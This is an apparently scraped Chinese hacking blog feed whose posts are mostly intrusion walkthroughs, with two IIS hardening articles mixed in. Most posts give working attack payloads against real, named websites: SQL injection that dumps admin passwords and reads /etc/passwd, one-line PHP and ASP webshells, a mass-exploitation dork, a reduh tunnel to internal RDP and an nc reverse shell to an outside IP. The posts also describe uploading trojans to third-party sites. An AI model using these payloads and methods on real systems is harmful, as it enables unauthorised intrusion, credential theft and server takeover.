<![CDATA[丫丫网络]]> http://hi.baidu.com http://hi.baidu.com http://img.baidu.com/img/logo-hi.gif http://hi.baidu.com/52hack zh-cn www.baidu.com 5 <![CDATA[对纵横时空文学站的一次安全检测(图)]]>






看到图1我们了解了网站的大概情况 首先就来查找注射漏洞。 随便打开一个带有参数的连接 地址为http://xzx.ouou.com/newslook.php?id=29 输入一个单引号检测, 成功返回错误信息, 并且暴出了WEB绝对路径,如图2







错误信息如下:



Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /data/webroot/zh/newslook.php on line 264



通过错误信息得知WEB路径为/data/webroot/zh/newslook.php通过路径可以肯定服务器为UNIX



继续使用and 1=1 1=2来判断是不是真的存在注射漏洞



http://xx.ouou.com/newslook.php?id=29【/**/and/**/1=1】/**/and/**/1=1 作用与我们在ASP注射中的 and 1=1的效果是一样的,因为有些站会过滤■空格,/**/是替代空格的。返回正常



继续http://xx.ouou.com/newslook.php?id=29【/**/and/**/1=2】



返回错误, 现在可以肯定http://xx.ouou.com/newslook.php?id=29 这个地址存在注射漏洞。



既然存在漏洞,我们就来通过注射点来查找到管理员的密码从而登陆后台来取得WEBSHELL。 现在来爆一下他的有多少个字段。



使用/**/order/**/by/**/10 来判断他的字段是不是小于10



http://XX.ouou.com/newslook.php?id=29【/**/order/**/by/**/10】 如图3







如图得知我们执行/**/order/**/by/**/10 页面返回错误 说明字段是小于10的 我们继续执行



http://ouou.com/newslook.php?id=29【/**/order/**/by/**/9】



http://ouou.com/newslook.php?id=29【/**/order/**/by/**/8】



http://ouou.com/newslook.php?id=29【/**/order/**/by/**/7】



http://ouou.com/newslook.php?id=29【/**/order/**/by/**/6】



http://.ouou.com/newslook.php?id=29【/**/order/**/by/**/5】



http://ouou.com/newslook.php?id=29【/**/order/**/by/**/4】



直到执行/**/order/**/by/**/4的时候页面返回正常 如图4







我们看到当执行/**/order/**/by/**/4到4的时候返回正常说明存在4个字段。 因为我们在前面已经得到MYSQL的版本 所以已经不用判断就知道是支持union联合查询的、



继续猜解密码



http://xx.ouou.com/newslook.php?id=29/**/and/**/1=2/**/union/**/select/**/1,2,3,4



返回出几个数字,一会帐号密码会从显示出来 :)



我们来爆字段名,经过一段时间的猜解最终确定表为admin



http://xx.ouou.com/newslook.php?id=29/**/and/**/1=2/**/union/**/select/**/1,2,3,4/**/from/**/admin 如图5



因为返回正常说明存在该表,返回错误则不存在。 经过半天的猜解解,确定列名为“pas”“us”“id”,把相应的列名对应上面的相应的数字,数字部分就会出现我们想要的的东西了。语句是这样的,上面显示的数字为2、3我们这里替换2、3为“pas”和“us”

id=29/**/and/**/1=2/**/union/**/select/**/1,pas,us,4/**/from/**/admin,这样在2、3部分就会出现帐号和密码了。



另外PHP注射如果在权限够的情况下是可以读到目标网站的的源文件,可以去读一些类似CONN的文件取得敏感信息。现在来判断下这个注射点有没有权限读文件



http://.ouou.com/newslook.php?id=29【/**/and/**/(select/**/count(*)/**/from/**/mysql.user)>0 /*】如图6







返回正常说明有权限读文件,现在可以调用load_file的函数来读文件了,还记刚才【’】爆出的绝对路径吧。直接读就可以了,不过要把路径转换成hex编码,为什么呢?因为某些字符在url会被转意比如\会被转意成/,既然试UNIX主机尝试读一下/etc/passwd 继续http://XX.ouou.com/newslook.php?id=29【/**/and/**/1=2/**/union/**/select/**/1,2,load_file(0x2F6574632F706173737764),4】



load_file(0x2F6574632F706173737764)替换3的位置,如果可以读3的位置会出现文件内容,如图7







看到了吧,可以读出来:)。【0x2F6574632F706173737764】是/etc/passwd的hex编码,接下来就是要去网站源文件然后去顶部找调用数据库的文件然后再读数据库文件找到mysql密码,这个我就不说了,因为我已经得到了 admin的密码 并且知道后台为http://XXouou.com/admin 直接登陆后台先拿个WEBSHELL再说 如图8







登陆后台发现权限非常大,可以直接看到跟目录的文件,并且我们看到“重命名”“编辑”“删除”等字样。 但是这里并不可以利用,因为一编辑就会提示你输入另一个密码。 另外我发现网站后台使用了FCKeditor编辑器。并且可以成功上传一个asa的文件。但是我们知道apache 是不解吸ASP文件的。所以就没有办法,只能寻找可以上传PHP的地方。



记的刚登陆后台后台的时候看到跟目录那里有个上传目录,尝试上传一个PHP发现提示更新成功,马上访问发现存在那个PHP文件。如图9











图10



至此我们已经成功的拿到了WEBSHELL 并且也找到了MYSQL密码。 发现WEBSHELL的权限非常大,至于提权就不需要了。马上通知朋友修补漏洞咯。

阅读全文
类别:破解工具使用 查看评论]]> 2009年08月02日 星期日 上午 03:10 http://hi.baidu.com/52hack/blog/item/535a6ad085851c86a1ec9c69.html <![CDATA[工具技巧]]> 此野猪OllyDBG系在shoooo大侠创作的“野猪力量 -- 注入”文章中原代码修改重新编译后,在cao_cong汉化的

第二版基础上,修正了目前已知BUG,能轻松调试Themida、Winlicense、ExeCryptor、ASProtect等强壳。

野猪力量有如下优点:

1.那些父进程的Anti失效;

2.现有检测OD特征码的Anti失效;

3.直接把OD注入到exepolrer.exe中;

当然,也有如下缺点:

1.不能调试DLL文件;

2.对某些插件不兼容;

3.不能添加到右键菜单中;

4.不能同时打开2个野猪Dbg;

5.不能自动配置UDD和PLUGIN为绝对路径;

注意事项:

1:首先设置好你的UDD和Plugin路径为绝对路径!(系统默认路径是在"C:\WINDOWS");

2:复制"野猪Dbg.ini"文件到"C:\WINDOWS\"下;

3:设置好OD插件里面的"HideOD"(调试Themida时用到);

4:根据个人需要添加插件时注意与此野猪Dbg是否兼容;

最后祝大家使用愉快!期待OLLYDBG 2.0 早日出现!









阅读全文
类别:破解工具使用 查看评论]]> 2009年08月02日 星期日 上午 03:08 http://hi.baidu.com/52hack/blog/item/73d48a268a7a931e8b82a169.html <![CDATA[iShowMusic V1.2音乐系统写入Shell漏洞(图)]]>



前段时间在Sebug看到一个漏洞公告,是iShowMusic音乐系统的漏洞,公告说明是error.php文件在接受程序错误的时候将错误记录到data/error.php里。因此导致提交的时候可以写入一句话参数。具体漏洞公告查看

http://www.sebug.net/vulndb/3604/

漏洞测试方法:

http://www.xxx.com/error.php?errid=1&errtitle=<?eval(_POST[a]);?>

Errtitle参数没有对提交来的内容进行任何过滤就把他写入到data/error.php这个文件里。

因此就产生了可以构造一句话木马获得shell的漏洞。好了废话不多说。找个站点测试下

百度:Powered by iShowSky.cn 有4600篇。。。再加google应该会更多吧。如果自己找到更好的关键词。效果会更不错。也不会和别人冲突。

Sebug出公告当天写的工具。。。玩过了。丢出来。。。当然还可以得到Webshell的。仅供学习参考。。。。。(.net平台开发。没装Framework的就Sorry了。O(∩_∩)o…最近学习C#练手)(1)



好了。这里我找好一个网站(2)



提示漏洞存在表示存在data/error.php 也就是是默认数据库没有修改。

现在就可以写入一句话了,看操作(3)



按下写入一句话。则跳转到上图页面。提交人随便写。然后按提交报告。会提示提交成功。如下图。说明写入成功了 (4)



接着我们点上传webshell..,地址和密码都给你填写好了。这里我用了一个海洋的php木马你也可以换自己的。默认密码是123456 (5)



我们一起来看看一句话地址是否提交成功(6)



似乎有不少人测试过。。呵呵。不多废话。。提交webshell看看(7)



提示成功了。看看。。。默认上传文件是shell.php在当前,目录下

也可以修改我程序里的filename=’shell.php’这里的名字。。保留上传部分代码方便自己修改。因为在PHP不同版本里可能不支持这个上传代码。。。我也不知道为什么。对PHP不熟悉。。(8)



OK上传成功。。。。至于乱码问题我也不知道为什么。。可能因为PHP用的是UTF-8 而我习惯用GB2312吧。。呵呵,可以使用。不喜欢自己换个自己的小马先上传就是了。呵呵 阅读全文
类别:破解工具使用 查看评论]]> 2009年08月02日 星期日 上午 03:06 http://hi.baidu.com/52hack/blog/item/8adcc511790dca19b8127b68.html <![CDATA[IIS优化 为Web服务器减负(图)]]> 1、禁止多余的Web服务扩展

  IIS6.0支持多种服务扩展,有些管理员偷懒或者不求甚解,担心Web运行中出现解析错误,索性在建站时开启了所有的Web服务扩展。殊不知,这其中的有些扩展比如“所有未知CGI扩展”、“在服务器端的包含文件”等是Web运行中根本用不到的,况且还占用IIS资源影响性能拖垮Web,甚至某些扩展存在漏洞容易被攻击者利用。因此,科学的原则是,用到什么扩展就启用什么扩展。

  如果企业站点是静态页面,那什么扩展都不要开启。不过现在的企业站点都是交互的动态页面比如asp、php、jsp等。如果是asp页面,那只需开启“Active Server Pages”即可。对于php、jsp等动态页面IIS6.0默认是不支持的需要进行安装相应组件实现对这些扩展的支持。不过,此时用不到的扩展完全可以禁用。

  禁止Web服务扩展的操作非常简单,打开“IIS管理器”,在左窗格中点击“Web服务扩展”,在右侧选择相应的扩展,然后点击“禁用”即可。(图1)

  IIS优化 为Web服务器减负

  2、删除不必要的IIS扩展名映射

  IIS默认支持.asp、.cdx等8种扩展名的映射,这其中除了.asp之外其他的扩展几乎用不到。这些用不着的扩展会加重web服务器的负担,而且带来一定的安全隐患。比如.asa,.cer等扩展名,就可以被攻击者利用来获得webshell。因为一般的asp系统都会限制asp文件的上传,但如果没有限制.asa或者.cer等扩展名,攻击者就可以更改文件后缀突破上传限制,运行.asa或者.cer的文件获得webshell。(图2)

  IIS优化 为Web服务器减负

  删除IIS扩展名的操作是:打开IIS管理器,右键单击“默认Web站点”选择“属性”,点击“主目录”选项卡,然后点击“配置”打开应用程序窗口,最后根据自己的需要选择不必要的应用程序映射比如.shtml, .shtm, .stm等,然后点击“删除”即可。(图3)

  IIS优化 为Web服务器减负

3、取消访问记录   IIS6.0默认开启对于web的访问记录。当开启记录功能后,IIS会事无巨细地忠实记录所有的web访问记录。这些记录文件的内容是非常庞杂的,比如访问时间、客户端IP、从哪个链接访问、 Cookies等,另外还包括 Method(方法), UserAgent(用户代理)等。这些记录不但占用大量的磁盘空间还大大地影响了web服务器的性能。有人做过评测,停止访问记录可以提升5%到8%的web性能。而且这些记录对于一般用户,特别是中小型的Web站点没有什么用途,简直太耗费系统性能了,因此建议关闭它。

  取消访问记录的操作是:打开IIS管理器,定位到具体的web站点,右键点击选择“属性”,在“主目录”选项卡下取消对“记录访问”的勾选即可。(图4)

  IIS优化 为Web服务器减负

  4、对访问流量进行限制

  默认情况下IIS 6.0对于访问量是没有限制的,如果并发连接过大超过了Web的负载轻则发生网络拥塞,重则导致服务器宕机。因此需要对用户的访问进行限制,控制Web访问的流量。

  打开“Internet信息服务”管理器,在其窗口右侧点击主机名前面的“ ”号,依次定位到某个Web站点上。选中该Web站点右键单击选择“属性”,在打开的属性设置窗口中选中“性能”标签,将“启用带宽限制”复选框选中,在随后被激活的“最大网络使用”设置框中,指定你的网络站点带宽的具体数值。大家可以根据服务器的性能及其访问量综合考虑继续设置。对于一般的企业站点将带宽流量设置为1500kb/s就差不多了。同时在“网站连接”下可以进行连接限制的设置,大家可以根据情况设置一个数值。完成以上设置后,IIS就只能使用其被授予的资源进行Web服务,杜绝了异常情况造成的服务器过载,为Web减负。(图5)

  IIS优化 为Web服务器减负

5、让Web负载自由伸缩   默认情况下IIS是全负荷地为Web提供服务的,这在一定程度上加重了Web负担。如何能够自动地根据负载变化自动调节工作进程呢?

  利用IIS 6.0的Web园,我们只需指定用于某个应用程序池的工作进程的数量就可以了实现各个Web站点之间的隔离。具体的配置步骤是:在“Internet信息服务”管理器中打开应用程序池的“属性”对话框,转到“性能”页,在“Web园”下面的“最大工作进程数”输入框中输入进程数量。当服务器的负载较小,不需要额外的工作进程时,IIS 6.0在一定的时间后(默认20分钟,可配置)自动缩减实际的工作进程数量;如果负载变大,需要额外的工作进程,IIS 6.0再次增加工作进程数量。另外,还可以“启用CUP监视”,设置“最大CPU使用率”,“刷新CUP使用率值”以及“CPU使用率超过最大使用率是执行的操作”,这些设置可以根据需要进行设置。当一切设置完成后这一切就交给IIS自动进行,不需要管理员干预。 (图6)

  IIS优化 为Web服务器减负

  6、配置应用呈现池

  IIS可以支持多个Web服务,特别是虚拟主机一台服务器上有非常多的Web站点。如何才能做到各个站点之间相互独立,不因某些Web站点出现故障而影响其他站点呢?为不同工作进程指定应用程序池是个很好的解决办法。

  (1)、创建

  打开“IIS 管理器”中,展开本地计算机,右键单击“应用程序池”,选择“新建→应用程序池”。在“应用程序池名称”框中,输入新的应用程序池名称。如果点选选“将现有应用程序池作为模板”,可以在“应用程序池名称”下来列表中选择相应的应用程序池,最后单击“确定”即可。 (图7)

  IIS优化 为Web服务器减负

  (2)、指派

  在“IIS 管理器中”,右键单击你要为其指派应用程序池的站点然后单击“属性”。在该站点的属性面板中“主目录”选项卡,在“应用程序池”下拉列表中选择刚才创建的应用程序池即可。如果所有的选项为灰色,单击“创建”按钮就可以输入“应用程序名”,然后在“应用程序池”列表框中,选择并指派网站的应用程序池了。(图8)

  IIS优化 为Web服务器减负

  (3)、回收

  利用“回收”功能,可是设置如何恢复系统资源进行IIS资源使用的灵活定制。打开“IIS 管理控制台”,单击“ ”号依次“展开本地计算机→应用程序池”。选择你要回收的应用程序池右键单击选择“属性”,出现应用程序池的属性对话框,单击“回收”选项卡在其下可以设置“进程回收”、“内存回收”等,所有这些设置大家根据实际需要进行设置。(图9)

  IIS优化 为Web服务器减负

  总结:通过上述IIS优化措施,Web服务器就能轻装上阵其性能将会有较大的提升。当然,要从根本上改善Web性能,仅仅进行软设置是不够的。另外,还需要进行硬件改造,软硬结合才是最完美的解决方案。

阅读全文
类别:破解工具使用 查看评论]]> 2009年08月02日 星期日 上午 03:05 http://hi.baidu.com/52hack/blog/item/84f284544d6b7d163b293568.html <![CDATA[内网渗透利器reduh的使用方法(图)]]> 国外大牛的作品,偶顺手写了个使用说明。e文好的看原文 http://www.sensepost.com/research/reduh/

这个工具可以把内网服务器的端口通过http/https隧道转发到本机,形成一个连通回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。

本机-------客户端---------(http隧道)-----------服务端------------------内网服务器

服务端是个webshell(针对不同服务器有aspx,php,jsp三个版本),客户端是java写的,本机执行最好装上jdk。

把客户端文件解包,这里我把它放到e盘的test文件夹

把服务端的webshell上传到目标服务器

目标服务器在内网,开了终端服务。

命令行下用客户端连接服务端

e:\test>java reduhclient 目标服务器域名 http 80 /webshell路径/reduh.asp

新开一个命令行,用nc连接本机1010端口。

h:\>nc -vv localhost 1010



连接成功会有欢迎提示,之后输入命令

>>[createtunnel]1234:127.0.0.1:3389

前面的1234是本机连接用的端口,中间的ip地址是目标服务器的(可以是webshell所在服务器也可以是和它同内网的服务器),后面的3389是欲连接目标服务器的端口。

成功后两个命令行窗口都会有成功提示。

这时通道已经建立,你连接本机的1234端口就相当于连接到目标服务器的3389端口了。

数据的传递过程

需要注意的是用此工具转发数据速度很慢,连接的时候应尽量把mstsc的颜色设置调低些。

阅读全文
类别:破解工具使用 查看评论]]> 2009年08月02日 星期日 上午 03:03 http://hi.baidu.com/52hack/blog/item/867d32f398026459342acc68.html <![CDATA[合理配置服务器防止Webshell是有效方法(图)]]>


  一、防止数据库被非法下载



  应当说,有一点网络安全的管理员,都会把从网上下载的网站程序的默认数据库路径进行更改。当然也有一部分管理员非常粗心,拿到程序直接在自己的服务器上进行安装,甚至连说明文件都不进行删除,更不要说更改数据库路径了。这样黑客就可以通过直接从源码站点下载网站源程序,然后在本地测试找到默认的数据库,再通过下载数据库读取里面的用户信息和资料(一般是经过MD5加密的)找到管理入口进行登陆获得webshell。还有一种情况是由于程序出错暴出了网站数据库的路径,那么怎么防止这种情况的发生呢?我们可以添加mdb的扩展映射。如下图所示:

  打开IIS添加一个MDB的映射,让mdb解析成其他下载不了的文件:“IIS属性”—“主目录”—“配置”—“映射”—“应用程序扩展”里面添加.mdb文件应用解析,至于用于解析它的文件大家可以自己进行选择,只要访问数据库文件出现无法访问就可以了。



  这样做的好处是:1只是要是mdb后缀格式的数据库文件就肯定下载不了;2对服务器上所有的mdb文件都起作用,对于虚拟主机管理员很有用处。



  二、防止上传



  针对以上的配置如果使用的是MSSQL的数据库,只要存在注入点,依然可以通过使用注入工具进行数据库的猜解。倘若上传文件根本没有身份验证的话,我们可以直接上传一个asp的木马就得到了服务器的webshell。



  对付上传,我们可以总结为:可以上传的目录不给执行权限,可以执行的目录不给上传权限。Web程序是通过IIS用户运行的,我们只要给IIS用户一个特定的上传目录有写入权限,然后又把这个目录的脚本执行权限去掉,就可以防止入侵者通过上传获得webshell了。配置方法:首先在IIS的web目录中,打开权限选项卡、只给IIS用户读取和列出目录权限,然后进入上传文件保存和存放数据库的目录,给IIS用户加上写入权限,最后在这两个目录的“属性”—“执行权限”选项把“纯脚本”改为“无”即可。见下图:

  最后提醒一点,在你设置以上权限的时候,一定要注意到设置好父目录的继承。避免所做的设置白费。 三、MSSQL注入



  对于MSSQL数据库的防御,我们说,首先要从数据库连接帐户开始。数据库不要用SA帐户。使用SA帐户连接数据库对服务器来说就是一场灾难。一般来说可以使用DB_OWNER权限帐户连接数据库,如果可以正常运行,使用public用户最安全的。设置成dbo权限连接数据库之后,入侵者基本就只能通过猜解用户名和密码或者是差异备份来获得webshell了,对于前者,我们可以通过加密和修改管理后台的默认登陆地址来防御。对于差异备份,我们知道它的条件是有备份的权限,并且要知道web的目录。寻找web目录我们说通常是通过遍历目录进行寻找或者直接读取注册表来实现。无路这两个方法的哪一种,都用到了xp_regread和xp_dirtree两个扩展存储过程,我们只需要删除这两个扩展存储就可以了,当然也可以把对应的dll文件也一起删除。

  但是如果是由于程序出错自己暴出了web目录,就没有办法了。所以我们还要让帐户的权限更低,无法完成备份操作。具体操作如下:在这个帐户的属性—数据库访问选项里只需要对选中对应的数据库并赋予其DBO权限,对于其他数据库不要操作。接着还要到该数据库—属性—权限把该用户的备份和备份日志的权限去掉,这样入侵者就不能通过差异备份获得webshell了。

阅读全文
类别:破解工具使用 查看评论]]> 2009年08月02日 星期日 上午 03:01 http://hi.baidu.com/52hack/blog/item/88e4a1012f8de30f1c958368.html <![CDATA[黑客技术]]> 前提:
1.能用webshell运行cmd命令。
方法有很多,首先是wscript.shell,如果被改名或者被删了,就找可运行目录上传cmd.exe。

2.上传nc。可以跟cmd.exe上传到同一目录。

步骤:
现在本地监听一个端口。

nc -vv -l -p 8080

最好是80或8080这样的端口,被防火墙拦截的几率小很多。我机器80被apache占了,就用8080了。

在webshell运行下面命令连接我们监听的端口得到cmdshell:

nc -vv 222.71.138.177 8080 -e c:\documents and settings\all users\documents\cmd.exe

(假设cmd.exe是上传在“c:\documents and settings\all users\documents\”这个目录的)
稍等片刻,不出意外的话就可以得到cmdshell了。

不过我前面也说了,是低权限的cmdshell,能做的事情很少,但如果我们要运行很多cmd命令的话,还是要方便很多。
如果要在反弹的cmdshell里面运行上传的程序,要用如下个格式:

c:\windows\system32\inetsrv>"c:\documents and settings\all users\documents\cmd.exe"


阅读全文
类别:破解工具使用 查看评论]]> 2009年08月02日 星期日 上午 03:00 http://hi.baidu.com/52hack/blog/item/3e8913d5b6eb50cd50da4b6f.html <![CDATA[进后台简单拿Webshell(适合菜鸟)(图)]]>
admin appliedtek101.

工具: WSockExpert.exe抓包工具,明小子

打开抓包工具的界面,你会看到什么也没有,然后注意点 左上面那小文件夹图标

,然后出现选择那个iexplore.exe,找到企业后台管理,然后点open,设置如图1





点open以后你将什么也开不到,那就对了,因为你还没上传

进去找个文章发表的地方,肯定有大家放心,数据库备分肯定没有,那管理员就太```好我找了一个,随便上传了图片,出现如图2,你们如果上传不一定出现啊 ``因为是程序设置的不一样







提示上传成功```OK!现在我们就去抓包那里看看有没有变化,呵呵``变化是有的```我们应该找到post

原因我不说了,牵扯到数据包发送,接受还有网络协议等等`````如果你有兴趣自己可以研究下```如图3





点了POST我们看到底下的内容,POST /upfilea.asp :http://www.appliedtek.com/uploada.asp ,这两个信息是代会我们要上传的地址

这里我大体说下,为什么我们会有两个地址呢,一个uploada和一个upfilea呢!那一个是目录,一个文件,当然用明小子是用的文件了也就是地址!然后就是cookies 复制下来,以后要填写在明小子里

上传地址:http://www.appliedtek.com/upfilea.asp

打开明小子这里有好四个选项,这四个都是大型网站的摸版,上传地址的后缀要跟上面其中一个符合,第一个肯定不行,因为是BBS 所以我们选择第二个,然后设置如图4示



自己选个小马,明小子带的好象不行了 上传小马的地址就是我在上图标志的那个,用浏览器打开就可以得到如图5的页面,就是上传大马的页面,然后选择大马,把路径就是选择文件保存的绝对路径:D:\hosting\wwwroot\appliedtek_com\htdocs\Upload,然后再后面随便写个test.asp 为大马的访问地址!然后上传大马,提示上传成功!如图5/6/7













成功上传后你就得到了shell了,然后输入http://www.appliedtek.com/Upload/test.asp 输入密码进去就可以了!如图8







好了呵呵```就这么完了```太NX了````

阅读全文
类别:破解工具使用 查看评论]]> 2009年08月02日 星期日 上午 02:58 http://hi.baidu.com/52hack/blog/item/d083912563b5d16935a80f6f.html <![CDATA[黑客技术]]> 来源: 零魂’s blog

昨天看一篇文章中说到mysql导出一句话木马拿webshell的方法。
文章中用到的sql语句大体如下(命令行或者其它能执行sql命令的shell都行):

drop table if exists temp; //如果存在temp就删掉
create table temp(cmd text not null); //建立temp表,里面就一个cmd字段
insert into temp (cmd) values(’<? php eval(_post[cmd]);?>’); //把一句话木马插入到temp表
select cmd from temp into out file ’f:/wwwroot/eval.php’; //查询temp表中的一句话并把结果导入到eval.php
drop table if exists temp; //删除temp(擦屁股o(∩_∩)o...)

这几句sql很简单,我做了简单的注释。
不过想想我们在测试php的sql漏洞的时候经常用如下的语句:

/**/union select 1,2,3,4,5,6,7,8,9,10,11,12/*

然后返回的页面中可能会出现1~12之间的数字。这里加入数字3显示出来了。
如果我们把上面这句改成/**/union select 1,2,’zerosoul’,4,5,6,7,8,9,10,11,12/*,则返回页面上次显示3的地方会显示zerosoul。
也就是说如果我们的select语句后面不带from table语句的话,我们说查询的数字或字符会直接返回到查询结果里。
既然这样,我们为何还要那么麻烦去建一个表,先导入数据,再导出这样折腾呢。

有了这个思路,上面那一大段到出一句话的sql代码可以直接简化到一句:

select ’<? php eval(_post[cmd]);?>’ into outfile ’f:/wwwroot/eval.php’;

这样做不但简单明了,而且避免了误删别人的数据。
效果图如下:

阅读全文
类别:破解工具使用 查看评论]]> 2009年08月02日 星期日 上午 02:56 http://hi.baidu.com/52hack/blog/item/2a31590f4a7d5a236159f36f.html <![CDATA[动网8.1后台获取Webshell的详细方法(图)]]>
文章难易度:★★★

文章阅读点:动网8.1后台获取Webshell的详细方法

话说这期公布了一个动网8.1的最新注入漏洞,利用该漏洞可以轻松得到管理员密码的MD5值,进而查询密码明文进入后台。不过至于进了后台怎么拿 Webshell就没有介绍,本文将详细讲述动网8.1论坛后台获取Webshell的方法。动网虽然一直“洞”不断,不过8.1版本明显在后台安全方面比以前的版本加强了一些,甚至让不少朋友觉得“动网8.1终结了后台获取Webshell的可能”。其实不然,8.1后台一样可以得到Webshell,不过和8.0的有点不同。



一、后台备份

标题咋一看是老套路,但是如果你按照8.0的方法来试的话,结果会让你很失望的。此方法需要满足两个条件:

(1)、IIS6.0;

(2)、论坛可以执行上传及数据备份等操作。

要执行数据备份的前提,当然是你已经得到了管理员的用户名及密码,成功进入了后台才成立了。虽然利用的依然是IIS6.0的缺陷,不过与8.0的拿法有不同之处,主要表现有如下几点:

1、备份论坛数据页面的“当前数据库路径”不可更改;

2、备份论坛数据页面的“备份数据库目录”不允许出现.asp字符;

3、恢复论坛数据页面的“目标数据库路径”不可更改;

4、用空数据库合并的文件恢复会导致论坛出错,后续的备份操作无法完成。



我们来分析一下以上的限制条件,1、3是没办法突破了,因为这是程序锁死了的,无法更改了。其实之前我和朋友有试过把备份和恢复数据页面里面的 disabled="disabled"去掉,再本地保存为htm文件,再提交相关操作。不过事实证明这样做完全没有任何用处,因为动网限定了这两处为定值,不管你提交什么它都按照事先设定的值来读,所以这两点没办法突破。然后就是第2点,不允许出现.asp字符,咋一看以为真的封死了。



可是从动网的代码发现只是限制了.asp,那我们就有机可乘了,目录不用.asp可以用.asa嘛,在IIS6.0下一样可以解析执行的!至于第4点,我们就需要变通一下了。从代码得知需要保留动网默认数据库里的一个表段Dv_TableList才不会影响到恢复后的备份操作,至于我们的主角一句话ASP马就可以插在这个 Dv_TableList表里面!为什么老说“恢复后的备份操作”呢?这是为了绕过1、3的限制,先将含有Dv_TableList表段(内插一句话 ASP马)的数据库改扩展为.txt后上传,然后利用“恢复论坛数据”功能把它恢复到/data/dvbbs8.mdb这个位置,接着再利用“备份论坛数据”功能将带马的文件备份到一个x.asa文件夹里,因为路径不可更改,只能顺着程序走了,让程序读自己的默认值来备份。说白了就是给动网来个“偷天换日”,把它原本以为正常的数据库文件换成我们带马的文件。这样就可以很巧妙的绕过上面所提及的四点限制了,至于(1)、(2)这两个硬伤就实在是回天无力了!



啰嗦了半天,菜菜可能头都大了,那我们再依照上面的描述操作一遍就简单明了咯。首先,我们要“制造”一个符合需求的.mdb文件:

1、把Data目录下的Dvbbs8.mdb复制出来,删掉除Dv_TableList以外的所有表段,如图1;

2、在TableType字段里插入数据,内容为一句话ASP马★★,如图2;

500)this.width=500;">

图1

500)this.width=500;">

图2

光这样还是不行的,因为即使数据库里只剩下一个表段,但体积依然比较惊人(大小为:2.04M)。这个体积远远超出了Windows 2003 默认不允许上传大于200K文件的限制!所以我们要把它变小点,让它变小的办法就是将它“转为Access 97 文件格式”(Dvbbs8.mdb是Access 2000格式的)如图3。



图3

“变身”后的Dvbbs8.mdb现在苗条很多了,大小仅为68K,符合要求了。然后我们把Dvbbs8.mdb改为Dvbbs8.txt(就是把扩展名. mdb改为.txt),这样做的目的是为了可以顺利上传。因为动网不允许上传.mdb文件(除非后台添加,不过多此一举),但允许上传.txt文件。

接下来的事情就比较简单了,只要别操作失误,就可以顺利得到Webshell了:

1、前台发帖上传Dvbbs8.txt,我这里的路径为http://127.0.0.1/UploadFile/2008-1/2008193431422189.txt;

2、进入后台备份下论坛的当前数据,记下备份的文件名,确保呆会能恢复回来;

3、打开恢复论坛数据页面,“备份数据库路径(相对)”处填入★../UploadFile/2008-1/2008193431422189.txt★,如图4。然后点击“恢复数据”后返回“成功恢复数据”;

4、打开备份论坛数据页面,“备份数据库目录(相对路径)”处改为★../x.asa★,然后点确定,如图5。返回成功,如图6。得到Webshell地址为http://127.0.0.1/x.asa/databack20081954149_36673.mdb,访问一下,成功了,如图7;

5、将第2步备份的数据库恢复回来。



图4



图5

500)this.width=500;">

图6

500)this.width=500;">

图7

这样就可以在IIS6.0的环境下顺利得到一句话Webshell了,用一句话客户端连接,提交环境变量,成功返回相关信息,如图8。



图8

不过千万要记住这些操作除1、2两步外其余的顺序不能乱,步骤也不能少,而且操作间隔时间别太长,越快越好。否则会达不到如期的效果。因为我们在获取 Webshell的同时也要为论坛的正常使用考虑,不注意恢复数据的话会给对方造成比较大的损失,而且容易惊动目标,引起管理员的注意,将你的入侵行为暴露无遗。 二、添加上传

这个方法也不是新东西了,以前我的一篇关于动网8.0的后台拿Webshell的文章里提到过。就是直接添加php为允许上传的类型。进入后台,在“常用快捷功能”下找到“论坛版面管理”。随便找一个版块,进入“高级设置”,找到“上传文件类型”,添加上一个php文件类型,如图9。



图9

然后拉到下面,点击“提交”保存设置。再到前台发帖上传.php后缀的PHP大马,如果服务器当前目录支持PHP脚本,那就可以拿到Webshell了。这个方法的限制条件就是当前目录是否解析php脚本了,比如我找了一个支持的目标就成功拿到Webshell了,如图10。



图10

或者添加上传其它当前上当支持的脚本扩展也可以。

结合前面的动网8.1最新漏洞,估计小菜们又可以拿到不少Webshell了。最后,恭祝各位读者在新的一年里:学有所成,肉鸡成群!

阅读全文
类别:破解工具使用 查看评论]]> 2009年08月02日 星期日 上午 02:55 http://hi.baidu.com/52hack/blog/item/3775203840b4642db9998f6f.html <![CDATA[入侵技术]]> 要源码咱就……
整体看




首页应该自己编写的。点连接加’测试注入。发现过滤了,不过过滤了post和get。cookie应该没过滤。。我也没尝试。换种方法再说。



先不管了,找下后台。看这个网站有点像企业站。就随便加了个manage目录。。没想到还真有。界面也非常丑陋。http://www.059466.com/manage/login.asp估计是自己写的。

‘or’=’or’
进去了



看这菜单。寒心。这样的管理功能能拿到webshell?郁闷。



于是我犯了一个错误。以为这就是后台。于是我就旁注去了。如果我认真想下前台的功能,就不会这样犯了。这是后话。
旁注嘛,打开http://www.114best.com/ip/114?w=www.059466.com
共检测到 36 个网站与www.059466.com在同一ip服务器上
找啊找啊。http://www.20030.cn/ 的站点。加admin跳后台



木目下载系统。百度一下。下载一份。查看默认数据库。最后用admin admin登陆进去- -
管理菜单还是弱弱的




技术不行,拿不到后台。没考虑用一句话方式。。。
换站继续http://www.ylpa.net/ 这个也是 在版权处看到powered by wrmps v5.0.2 2006-2009 wangren inc. 下载一份。按照默认库下载



可是,本地打开傻眼。



wm_password 才十位。。啊们。。。看样子应该是md5后取十位了 看下login.asp代码 找到md5 模块
md5=left(lcase(wordtohex(b) & wordtohex(c)),10)
果然。。。请教了bs大叔后,知道除了自己写程序跑密码就没其他办法,不过事后我想通过cookie欺骗不知道是否能行?哪位老大知道的说下~
最终也是放弃了。虽然……
继续找站。http://www.huayi2008.com
常规方法没效果。随便点连接,看到了友情连接。



原来还有sc目录。。。进去看下



注册登陆。后来发现其实不注册也行,下面有 非会员直接进入 的连接




还是科讯的产品。。昏了。。直接上传asp木马呢???事实告诉我我rp还是不错的。

上传完毕。可是地址呢。。。竟然没回显。。。晕。现在有个思路就是自己下载一份系统。然后观看上传文件的目录以及文件名的规律。于是百度下 科汛在线输出产品 找到官方网站
http://www.kesion.com/twcs/v2008/ 还真的是科汛的产品。。。发现是收费的。。我xxx。郁闷
不过订单连接。。



查看订单,http://www.huayi2008.com/sc/showorder.asp?id=359 加’ 报错。加and 1=1 正常。加and 1=2出错。晕。注入点。。。
用工具吧。密码没加密 很好。username:huayi2008com
password:36399796 用这账号登陆就是admin权限。
订单管理果然看到我们的上传文件。



http://www.huayi2008.com/sc/system/uploadimages/12.asp
